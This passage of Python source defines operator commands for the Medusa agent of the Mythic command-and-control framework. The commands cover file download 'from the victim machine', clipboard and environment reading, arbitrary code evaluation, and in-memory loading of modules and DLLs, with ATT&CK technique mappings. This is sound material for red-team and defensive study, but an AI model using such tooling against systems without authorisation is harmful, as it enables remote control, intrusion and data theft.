task.display_params = task.args.get_arg("path") return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/cd.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json import sys class CdArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="path", type=ParameterType.String, default_value=".", description="Path of file or folder on the current system to cd to", ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == "{": self.load_args_from_json_string(self.command_line) else: self.args["path"].value = self.command_line else: self.args["path"].value = "." 
class CdCommand(CommandBase): cmd = "cd" needs_admin = False help_cmd = "cd /path/to/file" description = "Change working directory" version = 1 author = "@ajpc500" attackmapping = [] argument_class = CdArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = task.args.get_arg("path") return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/clipboard.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * class GetClipboardArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [] async def parse_arguments(self): pass class GetClipboardCommand(CommandBase): cmd = "clipboard" needs_admin = False help_cmd = "clipboard" description = "This reads and outputs the contents of the clipboard using ObjC APIs" version = 1 is_exit = False is_file_browse = False is_process_list = False is_download_file = False is_remove_file = False is_upload_file = False author = "@ajpc500" argument_class = GetClipboardArguments attackmapping = [ "T1115" ] attributes = CommandAttributes( filter_by_build_parameter={ "python_version": "Python 2.7" }, supported_python_versions=["Python 2.7"], supported_os=[SupportedOS.MacOS], ) async def create_tasking(self, task: MythicTask) -> MythicTask: return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = 
PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/cp.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json class CpArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="destination", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=True, ui_position=2 )], description="Location for copied file or folder", ), CommandParameter( name="source", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=True, ui_position=1 )], description="Path to file or folder for copying", ) ] async def parse_arguments(self): if self.command_line[0] != "{": pieces = self.command_line.split(" ") if len(pieces) == 2: self.add_arg("source", pieces[0]) self.add_arg("destination", pieces[1]) else: raise Exception("Wrong number of parameters, should be 2") else: self.load_args_from_json_string(self.command_line) class CpCommand(CommandBase): cmd = "cp" needs_admin = False help_cmd = "cp source destination" description = "copy file or folder to destination" version = 1 author = "@ajpc500" attackmapping = [] argument_class = CpArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = "Copying " + str(task.args.get_arg("source")) + " to " task.display_params += str(task.args.get_arg("destination")) return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp 
================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/cwd.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * class GetCwdArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [] async def parse_arguments(self): pass class GetCwdCommand(CommandBase): cmd = "cwd" needs_admin = False help_cmd = "cwd" description = "This gets the current working directory" version = 1 is_exit = False is_file_browse = False is_process_list = False is_download_file = False is_remove_file = False is_upload_file = False author = "@ajpc500" argument_class = GetCwdArguments attackmapping = [] attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/download.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * class DownloadArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="file", type=ParameterType.String, description="File to download.", parameter_group_info=[ParameterGroupInfo( required=True )] ), ] async def parse_arguments(self): if len(self.command_line) == 0: raise Exception("Require a path to download.\n\tUsage: {}".format(DownloadCommand.help_cmd)) filename = "" if 
self.command_line[0] == '"' and self.command_line[-1] == '"': self.command_line = self.command_line[1:-1] filename = self.command_line elif self.command_line[0] == "'" and self.command_line[-1] == "'": self.command_line = self.command_line[1:-1] filename = self.command_line elif self.command_line[0] == "{": temp_json = json.loads(self.command_line) # if "host" in temp_json: # # this means we have tasking from the file browser rather than the popup UI # # the medusa agent doesn't currently have the ability to do _remote_ listings, so we ignore it # filename = temp_json["path"] + "/" + temp_json["file"] filename = temp_json["file"] # else: # raise Exception("Unsupported JSON") else: filename = self.command_line if filename != "": self.args[0].value = filename class DownloadCommand(CommandBase): cmd = "download" needs_admin = False help_cmd = "download {path to remote file}" description = "Download a file from the victim machine to the Mythic server in chunks (no need for quotes in the path)." 
version = 1 supported_ui_features = ["file_browser:download"] is_download_file = True author = "@ajpc500" parameters = [] attackmapping = ["T1020", "T1030", "T1041"] argument_class = DownloadArguments browser_script = BrowserScript(script_name="download", author="@its_a_feature_", for_new_ui=True) attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse: response = PTTaskCreateTaskingMessageResponse( TaskID=taskData.Task.ID, Success=True, ) download_file = taskData.args.get_arg("file") response.DisplayParams = f"{download_file}" return response async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/download_bulk.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * class DownloadBulkArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="path", type=ParameterType.Array, default_value=[], description="Paths of file(s) or director(ies) to download.", parameter_group_info=[ParameterGroupInfo( required=True )] ), CommandParameter( name="mode", type=ParameterType.ChooseOne, choices=["archive", "iterative"], default_value="archive", description=( "Download mode: 'archive' bundles all files into a single in-memory zip archive, " "'iterative' sends each file individually." 
), parameter_group_info=[ParameterGroupInfo( required=False )] ), ] async def parse_arguments(self): if len(self.command_line) == 0: raise Exception( "Require a path to download.\n\tUsage: {}".format(DownloadBulkCommand.help_cmd) ) if self.command_line[0] == "{": temp_json = json.loads(self.command_line) if "path" in temp_json: path_val = temp_json["path"] if isinstance(path_val, str): temp_json["path"] = [path_val] self.load_args_from_dictionary(temp_json) else: raw = self.command_line if (raw[0] == '"' and raw[-1] == '"') or (raw[0] == "'" and raw[-1] == "'"): raw = raw[1:-1] self.add_arg("path", [raw]) class DownloadBulkCommand(CommandBase): cmd = "download_bulk" needs_admin = False help_cmd = 'download_bulk {"path": ["/remote/path", "/remote/path2"], "mode": "archive"}' description = ( "Bulk download file(s), director(ies), or a mix from the target machine. " "Use 'archive' mode to bundle everything into a single in-memory zip, " "or 'iterative' mode to transfer each file individually." 
) version = 1 is_download_file = True author = "@maclarel" parameters = [] attackmapping = ["T1020", "T1030", "T1041"] argument_class = DownloadBulkArguments browser_script = BrowserScript(script_name="download_bulk", author="@maclarel", for_new_ui=True) attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux], ) async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse: response = PTTaskCreateTaskingMessageResponse( TaskID=taskData.Task.ID, Success=True, ) paths = taskData.args.get_arg("path") mode = taskData.args.get_arg("mode") or "archive" display = ", ".join(paths) if isinstance(paths, list) else str(paths) response.DisplayParams = f"{display} (mode: {mode})" return response async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/env.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * class GetEnvArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [] async def parse_arguments(self): pass class GetEnvCommand(CommandBase): cmd = "env" needs_admin = False help_cmd = "env" description = "This gets all environment variables" version = 1 is_exit = False is_file_browse = False is_process_list = False is_download_file = False is_remove_file = False is_upload_file = False author = "@ajpc500" argument_class = GetEnvArguments attackmapping = [] attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux 
], ) async def create_tasking(self, task: MythicTask) -> MythicTask: return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/eval_code.py ================================================ from mythic_container.MythicCommandBase import * import json, re from mythic_container.MythicRPC import * import sys class EvalArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="command", type=ParameterType.String, description="Command to evaluate in Python interpreter", ) ] async def parse_arguments(self): if len(self.command_line) > 0: self.add_arg("command", self.command_line) async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class EvalCommand(CommandBase): cmd = "eval_code" needs_admin = False help_cmd = "eval_code python-code" description = "Evaluate python code in interpreter" version = 1 author = "@ajpc500" attackmapping = [] argument_class = EvalArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = task.args.get_arg("command") return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/exit.py ================================================ from mythic_container.MythicCommandBase import * 
import json from mythic_container.MythicRPC import * class ExitArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [] async def parse_arguments(self): pass class ExitCommand(CommandBase): cmd = "exit" needs_admin = False help_cmd = "exit" description = "This exits the current agent process" version = 1 supported_ui_features = ["callback_table:exit"] is_exit = True is_file_browse = False is_process_list = False is_download_file = False is_remove_file = False is_upload_file = False author = "" argument_class = ExitArguments attackmapping = [] attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/jobkill.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * import sys class JobKillArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="target_task_id", type=ParameterType.String, description="Stop a long-running job", ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == "{": self.load_args_from_json_string(self.command_line) else: self.add_arg("target_task_id", self.command_line) else: raise ValueError("Missing arguments") class JobKillCommand(CommandBase): cmd = "jobkill" needs_admin = False help_cmd = "jobkill {task_id}" description = "Sends a stop signal to a long-running 
job" version = 1 author = "@ajpc500" attackmapping = [] argument_class = JobKillArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = "Sending stop signal for task with id: " + task.args.get_arg("target_task_id") return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/jobs.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * class JobsArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [] async def parse_arguments(self): pass class JobsCommand(CommandBase): cmd = "jobs" needs_admin = False help_cmd = "jobs" description = "List running jobs" version = 1 is_exit = False is_file_browse = False is_process_list = False is_download_file = False is_remove_file = False is_upload_file = False author = "@ajpc500" argument_class = JobsArguments attackmapping = [] browser_script = BrowserScript(script_name="jobs", author="@ajpc500", for_new_ui=True) attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ 
FILE: Payload_Type/medusa/medusa/mythic/agent_functions/kill.py ================================================ from mythic_container.MythicCommandBase import * import json, re from mythic_container.MythicRPC import * import sys class KillArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="process_id", type=ParameterType.Number, description="ID of Process to Terminate", ) ] async def parse_arguments(self): if len(self.command_line) > 0: self.add_arg("process_id", self.command_line) async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class KillCommand(CommandBase): cmd = "kill" needs_admin = False help_cmd = "kill process_id" description = "Terminate process by ID" version = 1 author = "@ajpc500" attackmapping = [] supported_ui_features = [ "process_browser:kill" ] argument_class = KillArguments attributes = CommandAttributes( supported_python_versions=["Python 3.8"], supported_os=[ SupportedOS.Windows ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = f"Terminating process with PID: " + str(task.args.get_arg("process_id")) return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/list_apps.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * class ListAppsArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [] async def parse_arguments(self): pass class ListAppsCommand(CommandBase): cmd = "list_apps" needs_admin = False help_cmd = "list_apps" description = 
"This lists all running applications" version = 1 is_exit = False is_file_browse = False is_process_list = False is_download_file = False is_remove_file = False is_upload_file = False author = "@ajpc500" argument_class = ListAppsArguments attackmapping = [] browser_script = BrowserScript(script_name="list_apps", author="@ajpc500", for_new_ui=True) attributes = CommandAttributes( filter_by_build_parameter={ "python_version": "Python 2.7" }, supported_python_versions=["Python 2.7"], supported_os=[SupportedOS.MacOS], ) async def create_tasking(self, task: MythicTask) -> MythicTask: resp = await MythicRPC().execute("create_artifact", task_id=task.id, artifact="NSWorkspace.sharedWorkspace().runningApplications()", artifact_type="API Called", ) return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/list_dlls.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json class ListDllsArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="process_id", type=ParameterType.Number, default_value=0, parameter_group_info=[ParameterGroupInfo( required=False, )], description="ID of process to list loaded DLLs of, can be 0 for local process", ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == '{': temp_json = json.loads(self.command_line) self.add_arg("process_id", temp_json["process_id"]) else: self.add_arg("process_id", self.command_line) async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) 
class ListDllsCommand(CommandBase):
    """Windows-only command that lists DLLs loaded in a target process."""

    cmd = "list_dlls"
    needs_admin = False
    help_cmd = "list_dlls [process_id]"
    description = "List DLLs loaded in current or specified process"
    version = 1
    is_exit = False
    is_file_browse = False
    is_process_list = False
    is_download_file = False
    is_remove_file = False
    is_upload_file = False
    author = "@ajpc500"
    supported_ui_features = ["process_dlls:list"]
    argument_class = ListDllsArguments
    attackmapping = []
    browser_script = BrowserScript(script_name="list_dlls", author="@its_a_feature_", for_new_ui=True)
    attributes = CommandAttributes(
        supported_python_versions=["Python 3.8"],
        supported_os=[SupportedOS.Windows],
    )

    async def create_tasking(self, task: MythicTask) -> MythicTask:
        pid = task.args.get_arg("process_id")
        if pid == 0:
            # PID 0 is the sentinel for "the agent's own process".
            task.display_params = "Listing DLLs loaded in current process"
        else:
            task.display_params = f"Listing DLLs loaded in process with PID: {pid}"
        return task

    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
        return PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)


class ListModulesArguments(TaskArguments):
    """Arguments for list_modules: an optional module name for a detailed listing."""

    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = [
            CommandParameter(
                name="module_name",
                type=ParameterType.String,
                parameter_group_info=[ParameterGroupInfo(
                    required=False
                )],
                description="Provide full file listing for a loaded module.",
            )
        ]

    async def parse_arguments(self):
        if not self.command_line:
            return
        if self.command_line[0] == "{":
            self.load_args_from_json_string(self.command_line)
        else:
            self.add_arg("module_name", self.command_line)


class ListModulesCommand(CommandBase):
    """Cross-platform command reporting Python modules loaded in-memory."""

    cmd = "list_modules"
    needs_admin = False
    help_cmd = "list_modules [module_name]"
    description = "List Python modules loaded in-memory, or a full file listing for a specific module"
    version = 1
    is_exit = False
    is_file_browse = False
    is_process_list = False
    is_download_file = False
    is_remove_file = False
    is_upload_file = False
    author = "@ajpc500"
    argument_class = ListModulesArguments
    attackmapping = []
    attributes = CommandAttributes(
        supported_python_versions=["Python 2.7", "Python 3.8"],
        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux],
    )

    async def create_tasking(self, task: MythicTask) -> MythicTask:
        task.display_params = "Listing modules loaded in-memory"
        return task

    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
        return PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)


class ListTccArguments(TaskArguments):
    """Arguments for list_tcc: optional path to a TCC database."""

    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = [
            CommandParameter(
                name="db",
                type=ParameterType.String,
                parameter_group_info=[ParameterGroupInfo(
                    required=True
                )],
                default_value="/Library/Application Support/com.apple.TCC/TCC.db",
                description="Path to TCC database",
            )
        ]

    async def parse_arguments(self):
        if not self.command_line:
            # No input: fall back to the system-wide TCC database.
            self.add_arg("db", "/Library/Application Support/com.apple.TCC/TCC.db")
        elif self.command_line[0] == '{':
            temp_json = json.loads(self.command_line)
            self.add_arg("db", temp_json["db"])
        else:
            self.add_arg("db", self.command_line)
        # Always flag the tasking as a TCC listing for the agent side.
        self.add_arg("tcc", True, type=ParameterType.Boolean)
class LoadArguments(TaskArguments):
    """Arguments for load: the name of a not-yet-loaded command, chosen dynamically."""

    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = [
            CommandParameter(
                name="command",
                type=ParameterType.ChooseOne,
                description="Command to load into the agent",
                dynamic_query_function=self.get_commands
            ),
        ]

    async def get_commands(self, inputMsg: PTRPCDynamicQueryFunctionMessage) -> PTRPCDynamicQueryFunctionMessageResponse:
        """Return the medusa commands supported by this callback's OS and Python
        version that are not already loaded into the callback."""
        fileResponse = PTRPCDynamicQueryFunctionMessageResponse(Success=False)
        callbacks = await SendMythicRPCCallbackSearch(MythicRPCCallbackSearchMessage(
            SearchCallbackID=inputMsg.Callback,
            AgentCallbackID=inputMsg.Callback
        ))
        if not callbacks.Success:
            raise Exception(f"Failed to get callback: {callbacks.Error}")
        payloads = await SendMythicRPCPayloadSearch(MythicRPCPayloadSearchMessage(
            CallbackID=inputMsg.Callback,
            PayloadUUID=callbacks.Results[0].RegisteredPayloadUUID
        ))
        if not payloads.Success:
            raise Exception(f"Failed to get payload: {payloads.Error}")
        payload_os = payloads.Payloads[0].SelectedOS
        # FIX: guard against a payload missing the python_version build parameter
        # instead of raising an opaque IndexError from [...][0].
        python_version = next(
            (param.Value for param in payloads.Payloads[0].BuildParameters
             if param.Name == 'python_version'),
            None
        )
        if python_version is None:
            raise Exception("Payload has no 'python_version' build parameter")
        all_cmds = await SendMythicRPCCommandSearch(MythicRPCCommandSearchMessage(
            SearchPayloadTypeName="medusa",
            SearchOS=payload_os,
            SearchAttributes={
                "supported_python_versions": [python_version],
            },
        ))
        loaded_cmds = await SendMythicRPCCallbackSearchCommand(MythicRPCCallbackSearchCommandMessage(
            CallbackID=inputMsg.Callback
        ))
        if not all_cmds.Success:
            raise Exception("Failed to get commands for medusa agent: {}".format(all_cmds.Error))
        if not loaded_cmds.Success:
            raise Exception("Failed to fetch loaded commands from callback {}: {}".format(inputMsg.Callback, loaded_cmds.Error))
        all_cmds_names = set(r.Name for r in all_cmds.Commands)
        loaded_cmds_names = set(r.Name for r in loaded_cmds.Commands)
        logger.info(all_cmds_names)
        logger.info(loaded_cmds_names)
        # Offer only commands that exist for this payload but are not yet loaded.
        diff = all_cmds_names.difference(loaded_cmds_names)
        fileResponse.Success = True
        fileResponse.Choices = sorted(diff)
        return fileResponse

    async def parse_arguments(self):
        if self.command_line[0] != "{":
            self.add_arg("command", self.command_line)
        else:
            self.load_args_from_json_string(self.command_line)

    async def parse_dictionary(self, dictionary_arguments):
        self.load_args_from_dictionary(dictionary_arguments)


class LoadCommand(CommandBase):
    """Load a new command's source into the agent over the C2 channel."""

    cmd = "load"
    needs_admin = False
    help_cmd = "load"
    description = "This loads new functions into memory via the C2 channel."
    version = 1
    author = "@ajpc500"
    parameters = []
    attackmapping = ["T1030", "T1129"]
    argument_class = LoadArguments
    attributes = CommandAttributes(
        supported_python_versions=["Python 2.7", "Python 3.8"],
        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux],
    )

    async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:
        """Locate the agent-code file for the requested command, register it as a
        Mythic file, and pass its file id to the agent for in-memory loading."""
        response = PTTaskCreateTaskingMessageResponse(
            TaskID=taskData.Task.ID,
            Success=True,
        )
        command = await SendMythicRPCCommandSearch(MythicRPCCommandSearchMessage(
            SearchPayloadTypeName="medusa",
            SearchCommandNames=[taskData.args.get_arg("command")],
            SearchOS=taskData.Payload.OS
        ))
        if not command.Success:
            # FIX: the original referenced an undefined name `commands` here,
            # raising NameError instead of surfacing the intended error message.
            raise Exception("Failed to fetch commands from Mythic: " + command.Error)
        # Pick the agent-code suffix matching this payload's Python version.
        # FIX: default to ".py3" so py_suffix is always bound even if the
        # python_version build parameter is absent.
        py_suffix = ".py3"
        for build_param in taskData.BuildParameters:
            if build_param.Name == 'python_version':
                py_suffix = ".py2" if build_param.Value == "Python 2.7" else ".py3"
        cmd_code = ""
        loadingCommand = ""
        for cmd in command.Commands:
            try:
                path = ""
                for func in os.listdir(self.agent_code_path):
                    # Match either the version-specific suffix or a plain .py file.
                    if (func.endswith(py_suffix) or func.endswith(".py")) and cmd.Name == func.split(".")[0]:
                        path = func
                        break
                code_path = self.agent_code_path / "{}".format(path)
                cmd_code = open(code_path, "r").read() + "\n"
                loadingCommand = cmd.Name
            except Exception as e:
                await SendMythicRPCResponseCreate(MythicRPCResponseCreateMessage(
                    TaskID=taskData.Task.ID,
                    Response=f"Failed to find code for {cmd.Name}, skipping it\n".encode()
                ))
        if cmd_code != "":
            resp = await SendMythicRPCFileCreate(MythicRPCFileCreateMessage(
                TaskID=taskData.Task.ID,
                Comment=f"Loading the following command: {loadingCommand}\n",
                FileContents=cmd_code.encode(),
                Filename="medusa load command",
                DeleteAfterFetch=True
            ))
            if resp.Success:
                taskData.args.add_arg("file_id", resp.AgentFileId)
                response.DisplayParams = f"command: {loadingCommand}"
            else:
                raise Exception("Failed to register file: " + resp.Error)
        else:
            # Nothing to send; complete the task without agent involvement.
            response.Completed = True
            response.DisplayParams = "no command"
        return response

    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)
        return resp


class LoadDllArguments(TaskArguments):
    """Arguments for load_dll: path to an on-disk DLL plus the export to invoke."""

    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = [
            CommandParameter(
                name="dllpath",
                type=ParameterType.String,
                parameter_group_info=[ParameterGroupInfo(
                    required=True,
                    ui_position=1
                )],
                description="Location of on-disk DLL",
            ),
            CommandParameter(
                name="dllexport",
                type=ParameterType.String,
                parameter_group_info=[ParameterGroupInfo(
                    required=True,
                    ui_position=2
                )],
                description="Export of target DLL",
            ),
        ]

    async def parse_arguments(self):
        if self.command_line[0] != "{":
            pieces = self.command_line.split(" ")
            if len(pieces) == 2:
                self.add_arg("dllpath", pieces[0])
                self.add_arg("dllexport", pieces[1])
            else:
                raise Exception("Wrong number of parameters, should be 2")
        else:
            self.load_args_from_json_string(self.command_line)
class LoadModuleArguments(TaskArguments):
    """Arguments for load_module: a zipped Python library plus its import name."""

    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = [
            CommandParameter(
                name="file",
                type=ParameterType.File,
                description="Zipped library to upload"
            ),
            CommandParameter(
                name="module_name",
                type=ParameterType.String,
                description="Name of module to load, e.g. cryptography"
            )
        ]

    async def parse_arguments(self):
        if len(self.command_line) > 0:
            if self.command_line[0] == "{":
                self.load_args_from_json_string(self.command_line)
            else:
                raise ValueError("Missing JSON arguments")
        else:
            raise ValueError("Missing arguments")


class LoadModuleCommand(CommandBase):
    """Upload a zipped Python library and import it in-memory on the agent."""

    cmd = "load_module"
    needs_admin = False
    help_cmd = "load_module"
    description = (
        "Upload a python library and load it in-memory"
    )
    version = 1
    author = "@ajpc500"
    attackmapping = []
    argument_class = LoadModuleArguments
    attributes = CommandAttributes(
        supported_python_versions=["Python 2.7", "Python 3.8"],
        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux],
    )

    async def create_tasking(self, task: MythicTask) -> MythicTask:
        try:
            file_resp = await MythicRPC().execute(
                "get_file",
                task_id=task.id,
                file_id=task.args.get_arg("file"),
                get_contents=False
            )
            # FIX: sibling commands (load_script, shinject) compare against
            # MythicStatus.Success; the original used MythicRPCStatus, an
            # undefined name whose NameError was swallowed by the broad except.
            if file_resp.status == MythicStatus.Success:
                if len(file_resp.response) > 0:
                    task.display_params = f"Loading {task.args.get_arg('module_name')} module into memory"
                elif len(file_resp.response) == 0:
                    raise Exception("Failed to find the named file. Have you uploaded it before? Did it get deleted?")
            else:
                raise Exception("Error from Mythic RPC: " + str(file_resp.error))
            # Mark the upload as one-shot so it is removed after the agent fetches it.
            file_resp = await MythicRPC().execute("update_file",
                                                  file_id=task.args.get_arg("file"),
                                                  delete_after_fetch=True,
                                                  comment="Uploaded into memory for load_module")
        except Exception as e:
            raise Exception("Error from Mythic: " + str(sys.exc_info()[-1].tb_lineno) + str(e))
        return task

    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)
        return resp


class LoadScriptArguments(TaskArguments):
    """Arguments for load_script: the script file to load into the agent."""

    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = [
            CommandParameter(
                name="file",
                type=ParameterType.File,
                description="script to load"
            )
        ]

    async def parse_arguments(self):
        if len(self.command_line) > 0:
            if self.command_line[0] == "{":
                self.load_args_from_json_string(self.command_line)
            else:
                raise ValueError("Missing JSON arguments")
        else:
            raise ValueError("Missing arguments")
class LsArguments(TaskArguments):
    """Arguments for ls: a file or folder path (defaults to the current directory)."""

    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = [
